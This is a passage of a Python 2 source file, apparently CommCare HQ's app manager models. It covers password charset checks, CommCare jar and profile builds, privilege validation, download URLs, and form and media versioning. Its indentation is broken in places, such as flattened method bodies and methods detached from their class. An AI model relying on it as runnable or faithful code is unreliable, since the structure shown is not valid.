        salt = os.urandom(5).encode('hex')
        self.admin_password = make_password(raw_password, salt=salt)
        # n=numeric, a=alphanumeric, x=neither (see admin_password_charset)
        # NOTE(review): str.isnumeric only exists on unicode in Python 2 —
        # confirm raw_password is always unicode here.
        if raw_password.isnumeric():
            self.admin_password_charset = 'n'
        elif raw_password.isalnum():
            self.admin_password_charset = 'a'
        else:
            self.admin_password_charset = 'x'
def check_password_charset(self):
errors = []
if hasattr(self, 'profile'):
password_format = self.profile.get('properties', {}).get('password_format', 'n')
message = ('Your app requires {0} passwords '
'but the admin password is not {0}')
if password_format == 'n' and self.admin_password_charset in 'ax':
errors.append({'type': 'password_format',
'message': message.format('numeric')})
if password_format == 'a' and self.admin_password_charset in 'x':
errors.append({'type': 'password_format',
'message': message.format('alphanumeric')})
return errors
def get_build(self):
    """Resolve this app's CommCare build from its build spec."""
    return self.build_spec.get_build()
@property
def build_version(self):
    """The CommCare build version as a LooseVersion, or None if unset.

    LooseVersion compares component-wise: LooseVersion('2.12.0') > '2.2',
    even though the raw strings compare the other way.
    """
    version = self.build_spec.version
    return LooseVersion(version) if version else None
@property
def commcare_minor_release(self):
    """'major.minor' string of the CommCare build; mostly just for views."""
    major, minor = self.build_spec.minor_release()
    return '%d.%d' % (major, minor)
@property
def short_name(self):
    """App name truncated for display: at most 12 characters, ellipsized."""
    if len(self.name) <= 12:
        return self.name
    return '%s..' % self.name[:10]
@property
def has_careplan_module(self):
    """Base apps have no careplan modules; Application overrides this."""
    return False
@property
def url_base(self):
    """Base URL for this app: the custom override if set, else the site default."""
    return getattr(self, 'custom_base_url', None) or get_url_base()
@absolute_url_property
def post_url(self):
    """Form submission URL (secure variant when secure_submissions is enabled)."""
    view = ('receiver_secure_post_with_app_id' if self.secure_submissions
            else 'receiver_post_with_app_id')
    return reverse(view, args=[self.domain, self.get_id])
@absolute_url_property
def key_server_url(self):
    """URL of the key server for this domain."""
    return reverse('key_server_url', args=[self.domain])
@absolute_url_property
def ota_restore_url(self):
    """App-aware OTA restore endpoint for this app."""
    return reverse('app_aware_restore', args=[self.domain, self._id])
@absolute_url_property
def form_record_url(self):
    """PACT-specific form data API endpoint for this domain."""
    return '/a/%s/api/custom/pact_formdata/v1/' % self.domain
@absolute_url_property
def hq_profile_url(self):
    """Latest-profile download URL.

    RemoteApp already has a property called "profile_url";
    Application.profile_url just points here to stop the conflict.
    http://manage.dimagi.com/default.asp?227088#1149422
    """
    url = reverse('download_profile', args=[self.domain, self._id])
    return "%s?latest=true" % url
@absolute_url_property
def media_profile_url(self):
    """Latest media-profile download URL."""
    url = reverse('download_media_profile', args=[self.domain, self._id])
    return "%s?latest=true" % url
@property
def profile_loc(self):
    """jr:// resource location of the profile inside the build."""
    return "jr://resource/profile.xml"
@absolute_url_property
def jar_url(self):
    """Download URL for the built CommCare jar."""
    return reverse('corehq.apps.app_manager.views.download_jar', args=[self.domain, self._id])
def get_jar_path(self):
    """Return the j2me build resource directory for this app's platform,
    with an input-mode suffix for Nokia platforms."""
    platform_dirs = {
        'nokia/s40': 'Nokia/S40',
        'nokia/s60': 'Nokia/S60',
        'generic': 'Generic/Default',
        'winmo': 'Native/WinMo',
    }
    path = platform_dirs[self.platform]
    if self.platform in ('nokia/s40', 'nokia/s60'):
        input_suffixes = {
            'native': '-native-input',
            'roman': '-generic',
            'custom-keys': '-custom-keys',
            'qwerty': '-qwerty',
        }
        path += input_suffixes[self.text_input]
    return path
def get_jadjar(self):
    """Fetch the jad/jar pair for this app's jar path from its build."""
    return self.get_build().get_jadjar(self.get_jar_path(), self.use_j2me_endpoint)
def validate_fixtures(self):
    """Raise PermissionDenied if any form uses lookup tables without the privilege."""
    if domain_has_privilege(self.domain, privileges.LOOKUP_TABLES):
        return
    # remote apps don't support get_forms yet.
    # for now they can circumvent the fixture limitation. sneaky bastards.
    if not hasattr(self, 'get_forms'):
        return
    for form in self.get_forms():
        if form.has_fixtures:
            raise PermissionDenied(_(
                "Usage of lookup tables is not supported by your "
                "current subscription. Please upgrade your "
                "subscription before using this feature."
            ))
def validate_intents(self):
    """Raise PermissionDenied if forms use ODK intents the subscription
    doesn't cover.

    With CUSTOM_INTENTS any intent is allowed.  With only TEMPLATED_INTENTS,
    each intent must match one of the known callout templates.  With neither
    privilege, any intent at all is an error.
    """
    if domain_has_privilege(self.domain, privileges.CUSTOM_INTENTS):
        return

    # Remote apps have no get_forms; they are exempt from this check.
    if hasattr(self, 'get_forms'):
        for form in self.get_forms():
            intents = form.wrapped_xform().odk_intents
            if intents:
                if not domain_has_privilege(self.domain, privileges.TEMPLATED_INTENTS):
                    raise PermissionDenied(_(
                        "Usage of integrations is not supported by your "
                        "current subscription. Please upgrade your "
                        "subscription before using this feature."
                    ))
                else:
                    # app_callout_templates is a generator of the template
                    # list; take the current set of known template ids.
                    templates = next(app_callout_templates)
                    if len(set(intents) - set(t['id'] for t in templates)):
                        raise PermissionDenied(_(
                            "Usage of external integration is not supported by your "
                            "current subscription. Please upgrade your "
                            "subscription before using this feature."
                        ))
def validate_jar_path(self):
    """Raise AppEditingError when the chosen text input mode requires a newer
    CommCare version than this app's build provides."""
    build = self.get_build()
    setting = commcare_settings.get_commcare_settings_lookup()['hq']['text_input']
    value = self.text_input
    # 'since' maps each text-input value to the first CommCare version
    # supporting it; absent means always supported.
    setting_version = setting['since'].get(value)

    if setting_version:
        setting_version = tuple(map(int, setting_version.split('.')))
        my_version = build.minor_release()
        if my_version < setting_version:
            i = setting['values'].index(value)
            assert i != -1
            name = _(setting['value_names'][i])
            # 5 placeholders: name + 2-tuple required version + 2-tuple current version
            raise AppEditingError((
                '%s Text Input is not supported '
                'in CommCare versions before %s.%s. '
                '(You are using %s.%s)'
            ) % ((name,) + setting_version + my_version))
@property
def jad_settings(self):
    """Base key/value settings written into the CommCare.jad file."""
    settings = {
        'JavaRosa-Admin-Password': self.admin_password,
        'Profile': self.profile_loc,
        'MIDlet-Jar-URL': self.jar_url,
        #'MIDlet-Name': self.name,
        # e.g. 2011-Apr-11 20:45
        'CommCare-Release': "true",
    }
    # build_version is a LooseVersion; comparing against the string '2.8'
    # works because LooseVersion supports mixed comparison.
    if self.build_version < '2.8':
        settings['Build-Number'] = self.version
    return settings
def create_build_files(self, save=False, build_profile_id=None):
    """Generate all build artifacts; when save=True, record build metadata
    and queue every file as a lazy attachment."""
    built_on = datetime.datetime.utcnow()
    all_files = self.create_all_files(build_profile_id)
    if not save:
        return
    self.built_on = built_on
    self.built_with = BuildRecord(
        version=self.build_spec.version,
        build_number=self.version,
        datetime=built_on,
    )
    for filepath, contents in all_files.items():
        self.lazy_put_attachment(contents, 'files/%s' % filepath)
def create_jadjar_from_build_files(self, save=False):
    """Return (jad, jar) for this build, packing them from the build files
    on first use; a critical section prevents concurrent packing."""
    self.validate_jar_path()
    with CriticalSection(['create_jadjar_' + self._id]):
        try:
            # Fast path: both artifacts were already packed and attached.
            return (
                self.lazy_fetch_attachment('CommCare.jad'),
                self.lazy_fetch_attachment('CommCare.jar'),
            )
        except (ResourceError, KeyError):
            # Collect all build files (stored under 'files/') keyed by
            # their path relative to that prefix.
            all_files = {
                filename[len('files/'):]: self.lazy_fetch_attachment(filename)
                for filename in self.blobs if filename.startswith('files/')
            }
            all_files = {
                name: (contents if isinstance(contents, str) else contents.encode('utf-8'))
                for name, contents in all_files.items()
            }
            release_date = self.built_with.datetime or datetime.datetime.utcnow()
            jad_settings = {
                'Released-on': release_date.strftime("%Y-%b-%d %H:%M"),
            }
            jad_settings.update(self.jad_settings)
            jadjar = self.get_jadjar().pack(all_files, jad_settings)

            if save:
                self.lazy_put_attachment(jadjar.jad, 'CommCare.jad')
                self.lazy_put_attachment(jadjar.jar, 'CommCare.jar')
                # Record whether the packed jar was signed.
                self.built_with.signed = jadjar.signed

            return jadjar.jad, jadjar.jar
def validate_app(self):
    """Run the full build validation, returning a list of error dicts
    (empty when the app is buildable)."""
    errors = []

    errors.extend(self.check_password_charset())

    try:
        self.validate_fixtures()
        self.validate_intents()
        # Building all files exercises form rendering and suite generation,
        # surfacing most validation problems as exceptions.
        self.create_all_files()
    except CaseXPathValidationError as cve:
        errors.append({
            'type': 'invalid case xpath reference',
            'module': cve.module,
            'form': cve.form,
        })
    except UserCaseXPathValidationError as ucve:
        errors.append({
            'type': 'invalid user case xpath reference',
            'module': ucve.module,
            'form': ucve.form,
        })
    except (AppEditingError, XFormValidationError, XFormException,
            PermissionDenied, SuiteValidationError) as e:
        errors.append({'type': 'error', 'message': unicode(e)})
    except Exception as e:
        if settings.DEBUG:
            raise

        # this is much less useful/actionable without a URL
        # so make sure to include the request
        logging.error('Unexpected error building app', exc_info=True,
                      extra={'request': view_utils.get_request()})
        errors.append({'type': 'error', 'message': 'unexpected error: %s' % e})
    return errors
@absolute_url_property
def odk_profile_url(self):
    """Download URL for the ODK install profile."""
    return reverse('corehq.apps.app_manager.views.download_odk_profile', args=[self.domain, self._id])
@absolute_url_property
def odk_media_profile_url(self):
    """Download URL for the ODK install profile including multimedia."""
    return reverse('corehq.apps.app_manager.views.download_odk_media_profile', args=[self.domain, self._id])
@property
def odk_profile_display_url(self):
    """Shortened ODK profile URL when available, else the full one."""
    if self.short_odk_url:
        return self.short_odk_url
    return self.odk_profile_url
@property
def odk_media_profile_display_url(self):
    """Shortened ODK media profile URL when available, else the full one."""
    if self.short_odk_media_url:
        return self.short_odk_media_url
    return self.odk_media_profile_url
def get_odk_qr_code(self, with_media=False, build_profile_id=None):
    """Returns a QR code, as a PNG to install on CC-ODK"""
    try:
        # Serve the cached QR code attachment when one exists.
        return self.lazy_fetch_attachment("qrcode.png")
    except ResourceNotFound:
        # Generate it via Google Charts and cache it as an attachment.
        from pygooglechart import QRChart
        HEIGHT = WIDTH = 250
        code = QRChart(HEIGHT, WIDTH)

        url = self.odk_profile_url if not with_media else self.odk_media_profile_url
        if build_profile_id is not None:
            url += '?profile={profile_id}'.format(profile_id=build_profile_id)
        code.add_data(url)

        # "Level L" error correction with a 0 pixel margin
        code.set_ec('L', 0)
        f, fname = tempfile.mkstemp()
        code.download(fname)
        os.close(f)
        with open(fname, "rb") as f:
            png_data = f.read()
            self.lazy_put_attachment(png_data, "qrcode.png",
                                     content_type="image/png")
        return png_data
def generate_shortened_url(self, url_type, build_profile_id=None):
    """Return a bitly-shortened URL for the given download view, or None
    when bitly is unconfigured or the request fails.

    Note: on exception this falls through to an implicit return of None
    (the `else` branch is skipped), after logging.
    """
    try:
        if settings.BITLY_LOGIN:
            view_name = 'corehq.apps.app_manager.views.{}'.format(url_type)
            if build_profile_id is not None:
                long_url = "{}{}?profile={}".format(
                    self.url_base, reverse(view_name, args=[self.domain, self._id]), build_profile_id
                )
            else:
                long_url = "{}{}".format(self.url_base, reverse(view_name, args=[self.domain, self._id]))
            shortened_url = bitly.shorten(long_url)
        else:
            shortened_url = None
    except Exception:
        # Best-effort: URL shortening is not critical, so log and return None.
        logging.exception("Problem creating bitly url for app %s. Do you have network?" % self.get_id)
    else:
        return shortened_url
def get_short_url(self, build_profile_id=None):
    """Return a shortened jad download URL, cached on the doc for the
    default profile; profile-specific URLs are generated fresh."""
    if build_profile_id:
        return self.generate_shortened_url('download_jad', build_profile_id)
    if not self.short_url:
        self.short_url = self.generate_shortened_url('download_jad')
        self.save()
    return self.short_url
def get_short_odk_url(self, with_media=False, build_profile_id=None):
    """Return a shortened ODK install URL (media flavour optional), cached
    on the doc for the default profile."""
    view = 'download_odk_media_profile' if with_media else 'download_odk_profile'
    if build_profile_id:
        # Profile-specific URLs are never cached on the doc.
        return self.generate_shortened_url(view, build_profile_id)
    attr = 'short_odk_media_url' if with_media else 'short_odk_url'
    if not getattr(self, attr):
        setattr(self, attr, self.generate_shortened_url(view))
        self.save()
    return getattr(self, attr)
def fetch_jar(self):
    """Download the raw CommCare jar for this app's build."""
    return self.get_jadjar().fetch_jar()
def make_build(self, comment=None, user_id=None, previous_version=None):
    """Create a new saved build copy of this app: version all forms and
    media against the previous build, generate the build files, and record
    comment/user metadata. Returns the (unsaved) copy."""
    copy = super(ApplicationBase, self).make_build()
    if not copy._id:
        # I expect this always to be the case
        # but check explicitly so as not to change the _id if it exists
        copy._id = copy.get_db().server.next_uuid()

    # If the build profiles changed, every form must get a new version so
    # profile-specific artifacts are regenerated.
    force_new_forms = False
    if previous_version and self.build_profiles != previous_version.build_profiles:
        force_new_forms = True
    copy.set_form_versions(previous_version, force_new_forms)
    copy.set_media_versions(previous_version)
    copy.create_build_files(save=True)

    # since this hard to put in a test
    # I'm putting this assert here if copy._id is ever None
    # which makes tests error
    assert copy._id

    copy.build_comment = comment
    copy.comment_from = user_id
    if user_id:
        # First build by this user: flip their has_built_app flag.
        user = CouchUser.get(user_id)
        if not user.has_built_app:
            user.has_built_app = True
            user.save()
    copy.is_released = False

    if not copy.is_remote_app():
        copy.update_mm_map()

    return copy
def delete_app(self):
    """Soft-delete this app (doc_type suffixed with '-Deleted') and return
    a saved record that allows the deletion to be undone."""
    domain_has_apps.clear(self.domain)
    self.doc_type += '-Deleted'
    undo_record = DeleteApplicationRecord(
        datetime=datetime.datetime.utcnow(),
        domain=self.domain,
        app_id=self.id,
    )
    undo_record.save()
    return undo_record
def save(self, response_json=None, increment_version=None, **params):
    """Save the doc, busting the domain_has_apps cache when this is the
    domain's first app (new doc, no _rev, and the cache currently says
    the domain has no apps)."""
    if not self._rev and not domain_has_apps(self.domain):
        domain_has_apps.clear(self.domain)

    super(ApplicationBase, self).save(
        response_json=response_json, increment_version=increment_version, **params)
def set_form_versions(self, previous_version, force_new_version=False):
    """No-op for base apps; Application overrides this to version forms
    against the previous build."""
    pass
def set_media_versions(self, previous_version):
    """No-op for base apps; Application overrides this to version media
    against the previous build."""
    pass
def update_mm_map(self):
    """Rebuild media_language_map: per language, the media paths referenced
    by the app's forms. Cleared entirely when build profiles are unused."""
    if self.build_profiles and domain_has_privilege(self.domain, privileges.BUILD_PROFILES):
        for lang in self.langs:
            self.media_language_map[lang] = MediaList()
        for form in self.get_forms():
            xml = form.wrapped_xform()
            for lang in self.langs:
                media = []
                for path in xml.all_media_references(lang):
                    if path is not None:
                        media.append(path)
                        map_item = self.multimedia_map.get(path)
                        #dont break if multimedia is missing
                        if map_item:
                            # Mark the item as referenced from a form.
                            map_item.form_media = True
                self.media_language_map[lang].media_refs.extend(media)
    else:
        self.media_language_map = {}
def get_build_langs(self, build_profile_id=None):
    """Languages to include in a build: the profile's languages when a
    profile id is given, otherwise all of the app's languages."""
    if build_profile_id is None:
        return self.langs
    return self.build_profiles[build_profile_id].langs
def validate_lang(lang):
    """Raise ValueError unless `lang` looks like an ISO-639-style code,
    e.g. 'en', 'hin', or 'en-gb'."""
    if re.match(r'^[a-z]{2,3}(-[a-z]*)?$', lang) is None:
        raise ValueError("Invalid Language")
def validate_property(property):
    """
    Validate a case property name

    >>> validate_property('parent/maternal-grandmother_fullName')
    >>> validate_property('foo+bar')
    Traceback (most recent call last):
      ...
    ValueError: Invalid Property
    """
    # this regex is also copied in propertyList.ejs
    match = re.match(r'^[a-zA-Z][\w_-]*(/[a-zA-Z][\w_-]*)*$', property)
    if match is None:
        raise ValueError("Invalid Property")
def validate_detail_screen_field(field):
    """Raise ValueError unless `field` is a valid case-detail sort field
    expression (optionally namespaced and/or path-prefixed)."""
    # If you change here, also change here:
    # corehq/apps/app_manager/static/app_manager/js/detail-screen-config.js
    field_re = r'^([a-zA-Z][\w_-]*:)*([a-zA-Z][\w_-]*/)*#?[a-zA-Z][\w_-]*$'
    if re.match(field_re, field) is None:
        raise ValueError("Invalid Sort Field")
class SavedAppBuild(ApplicationBase):
    """An app build saved to couch, with JSON tailored for build lists."""

    def to_saved_build_json(self, timezone):
        """Return a display-ready dict of this build, with bulky/irrelevant
        keys removed and timestamps localized to `timezone`."""
        data = super(SavedAppBuild, self).to_json().copy()
        # BUG FIX: the original tuple was missing a comma after
        # 'translations', so Python concatenated the adjacent string
        # literals into a single bogus key 'translationsdescription' —
        # 'translations', 'description' and 'short_description' were
        # therefore never removed from the payload.
        for key in ('modules', 'user_registration', 'external_blobs',
                    '_attachments', 'profile', 'translations',
                    'description', 'short_description'):
            data.pop(key, None)
        built_on_user_time = ServerTime(self.built_on).user_time(timezone)
        data.update({
            'id': self.id,
            'built_on_date': built_on_user_time.ui_string(USER_DATE_FORMAT),
            'built_on_time': built_on_user_time.ui_string(USER_TIME_FORMAT),
            'menu_item_label': self.built_with.get_menu_item_label(),
            'jar_path': self.get_jar_path(),
            'short_name': self.short_name,
            'enable_offline_install': self.enable_offline_install,
        })
        comment_from = data['comment_from']
        if comment_from:
            try:
                comment_user = CouchUser.get(comment_from)
            except ResourceNotFound:
                # User doc is gone: fall back to the raw id.
                data['comment_user_name'] = comment_from
            else:
                data['comment_user_name'] = comment_user.full_name

        return data
class Application(ApplicationBase, TranslationMixin, HQMediaMixin):
    """
    An Application that can be created entirely through the online interface
    """
    modules = SchemaListProperty(ModuleBase)
    name = StringProperty()

    # profile's schema is {'features': {}, 'properties': {}, 'custom_properties': {}}
    # ended up not using a schema because properties is a reserved word
    profile = DictProperty()
    use_custom_suite = BooleanProperty(default=False)
    # overrides the server's base URL in generated profiles when set
    custom_base_url = StringProperty()
    cloudcare_enabled = BooleanProperty(default=False)
    # strategy used to generate app strings; see app_strings.CHOICES
    translation_strategy = StringProperty(default='select-known',
                                          choices=app_strings.CHOICES.keys())
    commtrack_requisition_mode = StringProperty(choices=CT_REQUISITION_MODES)
    auto_gps_capture = BooleanProperty(default=False)
    # slug of the template this app was created from, if any
    created_from_template = StringProperty()
    use_grid_menus = BooleanProperty(default=False)
@property
@memoized
def commtrack_enabled(self):
    """Whether the app's domain has CommTrack enabled (memoized; always
    False under unit tests so tests can override explicitly)."""
    if settings.UNIT_TESTING:
        return False  # override with .tests.util.commtrack_enabled

    domain_obj = Domain.get_by_name(self.domain) if self.domain else None
    return domain_obj.commtrack_enabled if domain_obj else False
@classmethod
def wrap(cls, data):
    """Wrap a raw app doc, migrating legacy data on the way in.

    Ensures every module has per-language case/referral labels, drops the
    obsolete 'commtrack_enabled' flag, resets form versions on working
    copies, and normalizes a null multimedia_map.
    """
    for module in data.get('modules', []):
        for attr in ('case_label', 'referral_label'):
            # dict.has_key() is deprecated (and removed in Python 3);
            # use the `in` operator instead.
            if attr not in module:
                module[attr] = {}
        for lang in data['langs']:
            if not module['case_label'].get(lang):
                module['case_label'][lang] = commcare_translations.load_translations(lang).get('cchq.case', 'Cases')
            if not module['referral_label'].get(lang):
                module['referral_label'][lang] = commcare_translations.load_translations(lang).get('cchq.referral', 'Referrals')
    data.pop('commtrack_enabled', None)  # Remove me after migrating apps
    self = super(Application, cls).wrap(data)

    # make sure all form versions are None on working copies
    if not self.copy_of:
        for form in self.get_forms():
            form.version = None

    # weird edge case where multimedia_map gets set to null and causes issues
    if self.multimedia_map is None:
        self.multimedia_map = {}

    return self
def save(self, *args, **kwargs):
    """Save the app and fire the app_post_save signal."""
    super(Application, self).save(*args, **kwargs)
    # Import loop if this is imported at the top
    # TODO: revamp so signal_connections <- models <- signals
    from corehq.apps.app_manager import signals
    signals.app_post_save.send(Application, application=self)
def make_reversion_to_copy(self, copy):
    """Revert this app to a previous build's state, clearing stale
    per-form caches and the broken-build flag."""
    app = super(Application, self).make_reversion_to_copy(copy)

    for form in app.get_forms():
        # reset the form's validation cache, since the form content is
        # likely to have changed in the revert!
        form.validation_cache = None
        form.version = None

    app.build_broken = False
    return app
@property
def profile_url(self):
    """Alias for hq_profile_url (avoids a name clash with RemoteApp)."""
    return self.hq_profile_url
@absolute_url_property
def suite_url(self):
    """Download URL for the generated suite.xml."""
    return reverse('download_suite', args=[self.domain, self.get_id])
@property
def suite_loc(self):
    """Suite resource location: relative path or jr:// URI."""
    return './suite.xml' if self.enable_relative_suite_path else "jr://resource/suite.xml"
@absolute_url_property
def media_suite_url(self):
    """Download URL for the generated media suite."""
    return reverse('download_media_suite', args=[self.domain, self.get_id])
@property
def media_suite_loc(self):
    """Media suite resource location: relative path or jr:// URI."""
    return "./media_suite.xml" if self.enable_relative_suite_path else "jr://resource/media_suite.xml"
@property
def default_language(self):
    """The app's first language, falling back to 'en' when none are set."""
    langs = self.langs
    return langs[0] if langs else "en"
def fetch_xform(self, module_id=None, form_id=None, form=None, build_profile_id=None):
    """Validate and render a form's XForm, returned as UTF-8 bytes.

    Pass either a form object or a (module_id, form_id) pair.
    """
    if not form:
        form = self.get_module(module_id).get_form(form_id)
    rendered = form.validate_form().render_xform(build_profile_id)
    return rendered.encode('utf-8')
def set_form_versions(self, previous_version, force_new_version=False):
    """
    Set the 'version' property on each form as follows to the current app version if the form is new
    or has changed since the last build. Otherwise set it to the version from the last build.
    """
    def _hash(val):
        return hashlib.md5(val).hexdigest()

    if previous_version:
        for form_stuff in self.get_forms(bare=False):
            filename = 'files/%s' % self.get_form_filename(**form_stuff)
            form = form_stuff["form"]
            if not force_new_version:
                form_version = None
                try:
                    previous_form = previous_version.get_form(form.unique_id)
                    # take the previous version's compiled form as-is
                    # (generation code may have changed since last build)
                    previous_source = previous_version.fetch_attachment(filename)
                except (ResourceNotFound, FormNotFoundException):
                    # Form is new in this build; leave form_version as None
                    # so the version resets below.
                    pass
                else:
                    previous_hash = _hash(previous_source)

                    # hack - temporarily set my version to the previous version
                    # so that that's not treated as the diff
                    previous_form_version = previous_form.get_version()
                    form.version = previous_form_version
                    my_hash = _hash(self.fetch_xform(form=form))
                    if previous_hash == my_hash:
                        # Unchanged since last build: keep the old version.
                        form_version = previous_form_version
                if form_version is None:
                    # None makes the form pick up the current app version.
                    form.version = None
                else:
                    form.version = form_version
            else:
                form.version = None
def set_media_versions(self, previous_version):
    """
    Set the media version numbers for all media in the app to the current app version
    if the media is new or has changed since the last build. Otherwise set it to the
    version from the last build.
    """

    # access to .multimedia_map is slow
    prev_multimedia_map = previous_version.multimedia_map if previous_version else {}

    for path, map_item in self.multimedia_map.iteritems():
        prev_map_item = prev_multimedia_map.get(path, None)
        if prev_map_item and prev_map_item.unique_id:
            # Re-use the id so CommCare knows it's the same resource
            map_item.unique_id = prev_map_item.unique_id
        if (prev_map_item and prev_map_item.version
                and prev_map_item.multimedia_id == map_item.multimedia_id):
            # Same underlying multimedia item: keep the previous version.
            map_item.version = prev_map_item.version
        else:
            # New or changed media: stamp it with the current app version.
            map_item.version = self.version
def ensure_module_unique_ids(self, should_save=False):
    """
    Creates unique_ids for modules that don't have unique_id attributes
    should_save: the doc will be saved only if should_save is set to True

    WARNING: If called on the same doc in different requests without saving,
    this function will set different uuid each time,
    likely causing unexpected behavior
    """
    if all(mod.unique_id for mod in self.modules):
        return
    for mod in self.modules:
        mod.get_or_create_unique_id()
    if should_save:
        self.save()
def create_app_strings(self, lang, build_profile_id=None):
    """Render the app strings file for a language; 'default' renders the
    default strings file using the app's translation strategy."""
    gen = app_strings.CHOICES[self.translation_strategy]
    if lang == 'default':
        return gen.create_default_app_strings(self, build_profile_id)
    return gen.create_app_strings(self, lang)
@property
def skip_validation(self):
    """The 'cc-content-valid' profile property; defaults to 'yes'."""
    profile = self.profile or {}
    return profile.get('properties', {}).get('cc-content-valid', 'yes')
@property
def jad_settings(self):
    """Base jad settings plus the Skip-Validation flag."""
    settings = super(Application, self).jad_settings
    settings['Skip-Validation'] = self.skip_validation
    return settings
def create_profile(self, is_odk=False, with_media=False,
                   template='app_manager/profile.xml', build_profile_id=None):
    """Render the profile XML for this app as UTF-8 bytes.

    Merges custom CommCare settings from the app's profile with defaults,
    case-sharing and logo properties, then renders the given template.
    """
    self__profile = self.profile
    app_profile = defaultdict(dict)

    for setting in commcare_settings.get_custom_commcare_settings():
        setting_type = setting['type']
        setting_id = setting['id']

        if setting_type not in ('properties', 'features'):
            setting_value = None
        elif setting_id not in self__profile.get(setting_type, {}):
            # Not set on the app: only emit when HQ's default differs from
            # CommCare's own default, so the phone ends up with HQ's value.
            if 'commcare_default' in setting and setting['commcare_default'] != setting['default']:
                setting_value = setting['default']
            else:
                setting_value = None
        else:
            setting_value = self__profile[setting_type][setting_id]
        if setting_value:
            app_profile[setting_type][setting_id] = {
                'value': setting_value,
                'force': setting.get('force', False)
            }
        # assert that it gets explicitly set once per loop
        del setting_value

    if self.case_sharing:
        app_profile['properties']['server-tether'] = {
            'force': True,
            'value': 'sync',
        }

    logo_refs = [logo_name for logo_name in self.logo_refs if logo_name in ANDROID_LOGO_PROPERTY_MAPPING]
    if logo_refs and domain_has_privilege(self.domain, privileges.COMMCARE_LOGO_UPLOADER):
        for logo_name in logo_refs:
            app_profile['properties'][ANDROID_LOGO_PROPERTY_MAPPING[logo_name]] = {
                'value': self.logo_refs[logo_name]['path'],
            }

    if with_media:
        profile_url = self.media_profile_url if not is_odk else (self.odk_media_profile_url + '?latest=true')
    else:
        profile_url = self.profile_url if not is_odk else (self.odk_profile_url + '?latest=true')

    if toggles.CUSTOM_PROPERTIES.enabled(self.domain) and "custom_properties" in self__profile:
        app_profile['custom_properties'].update(self__profile['custom_properties'])

    # First build language doubles as the profile locale.
    locale = self.get_build_langs(build_profile_id)[0]
    return render_to_string(template, {
        'is_odk': is_odk,
        'app': self,
        'profile_url': profile_url,
        'app_profile': app_profile,
        'cc_user_domain': cc_user_domain(self.domain),
        'include_media_suite': with_media,
        'uniqueid': self.copy_of or self.id,
        'name': self.name,
        'descriptor': u"Profile File",
        'build_profile_id': build_profile_id,
        'locale': locale
    }).encode('utf-8')
@property
def custom_suite(self):
    """Contents of the custom_suite.xml attachment, or '' when absent."""
    try:
        return self.lazy_fetch_attachment('custom_suite.xml')
    except ResourceNotFound:
        return ""
def set_custom_suite(self, value):
    """Store custom suite XML as the custom_suite.xml attachment."""
    self.put_attachment(value, 'custom_suite.xml')
def create_suite(self, build_profile_id=None):
    """Render suite.xml: template-based for legacy v1 apps, generated
    otherwise."""
    if self.application_version != APP_V1:
        return SuiteGenerator(self, build_profile_id).generate_suite()
    template = 'app_manager/suite-%s.xml' % self.application_version
    langs = self.get_build_langs(build_profile_id)
    return render_to_string(template, {
        'app': self,
        'langs': ["default"] + langs,
    })
def create_media_suite(self, build_profile_id=None):
    """Render the media suite XML for this app."""
    return MediaSuiteGenerator(self, build_profile_id).generate_suite()
@classmethod
def get_form_filename(cls, type=None, form=None, module=None):
    """Relative path of a form's XML inside the build files tree."""
    return 'modules-{}/forms-{}.xml'.format(module.id, form.id)
def create_all_files(self, build_profile_id=None):
    """Build every file for this app (profiles, suites, app strings, and
    each form's XForm), returned as a {path: contents} dict. Paths are
    prefixed with the build profile id when one is given."""
    prefix = '' if not build_profile_id else build_profile_id + '/'
    files = {
        '{}profile.xml'.format(prefix): self.create_profile(is_odk=False, build_profile_id=build_profile_id),
        '{}profile.ccpr'.format(prefix): self.create_profile(is_odk=True, build_profile_id=build_profile_id),
        '{}media_profile.xml'.format(prefix):
            self.create_profile(is_odk=False, with_media=True, build_profile_id=build_profile_id),
        '{}media_profile.ccpr'.format(prefix):
            self.create_profile(is_odk=True, with_media=True, build_profile_id=build_profile_id),
        '{}suite.xml'.format(prefix): self.create_suite(build_profile_id),
        '{}media_suite.xml'.format(prefix): self.create_media_suite(build_profile_id),
    }

    langs_for_build = self.get_build_langs(build_profile_id)
    for lang in ['default'] + langs_for_build:
        files["{prefix}{lang}/app_strings.txt".format(
            prefix=prefix, lang=lang)] = self.create_app_strings(lang, build_profile_id)
    for form_stuff in self.get_forms(bare=False):
        filename = prefix + self.get_form_filename(**form_stuff)
        form = form_stuff['form']
        try:
            files[filename] = self.fetch_xform(form=form, build_profile_id=build_profile_id)
        except XFormException as e:
            # Re-raise with the form's name so the user can locate the error.
            raise XFormException(_('Error in form "{}": {}').format(trans(form.name), unicode(e)))
    return files
# Accessor generated by IndexedSchema: get_modules() yields each module
# wrapped with its positional index (so module.id is available).
get_modules = IndexedSchema.Getter('modules')
@parse_int([1])
def get_module(self, i):
    """Return module `i` wrapped with its index; raises
    ModuleNotFoundException when out of range.

    The modulo normalizes negative indices (e.g. -1 -> last module's
    positive index) before attaching the id.
    """
    try:
        return self.modules[i].with_id(i % len(self.modules), self)
    except IndexError:
        raise ModuleNotFoundException()
def get_module_by_unique_id(self, unique_id):
    """Return the module with the given unique id, or raise
    ModuleNotFoundException."""
    for module in self.get_modules():
        if module.get_or_create_unique_id() == unique_id:
            return module
    raise ModuleNotFoundException(
        "Module in app '%s' with unique id '%s' not found"
        % (self.id, unique_id))
def get_forms(self, bare=True):
    """Iterate over every form in the app; with bare=False each item is a
    dict carrying the form together with its module."""
    for module in self.get_modules():
        for form in module.get_forms():
            if bare:
                yield form
            else:
                yield {
                    'type': 'module_form',
                    'module': module,
                    'form': form,
                }
def get_form(self, unique_form_id, bare=True):
    """Return the form with the given unique id (or its context dict when
    bare=False); raises FormNotFoundException when absent."""
    for obj in self.get_forms(bare):
        form = obj if bare else obj['form']
        if form.get_unique_id() == unique_form_id:
            return obj
    raise FormNotFoundException(
        "Form in app '%s' with unique id '%s' not found"
        % (self.id, unique_form_id))
def get_form_location(self, unique_form_id):
    """Return (module_index, form_index) for the given form unique id;
    raises KeyError when not found."""
    for m_index, module in enumerate(self.get_modules()):
        for f_index, form in enumerate(module.get_forms()):
            if form.unique_id == unique_form_id:
                return m_index, f_index
    raise KeyError("Form in app '%s' with unique id '%s' not found" % (self.id, unique_form_id))
@classmethod
def new_app(cls, domain, name, application_version, lang="en"):
    """Construct a fresh app with one language and no modules."""
    return cls(
        domain=domain,
        name=name,
        langs=[lang],
        modules=[],
        application_version=application_version,
    )
def add_module(self, module):
    """Append a module and return it wrapped with its index."""
    self.modules.append(module)
    return self.get_module(-1)
def delete_module(self, module_unique_id):
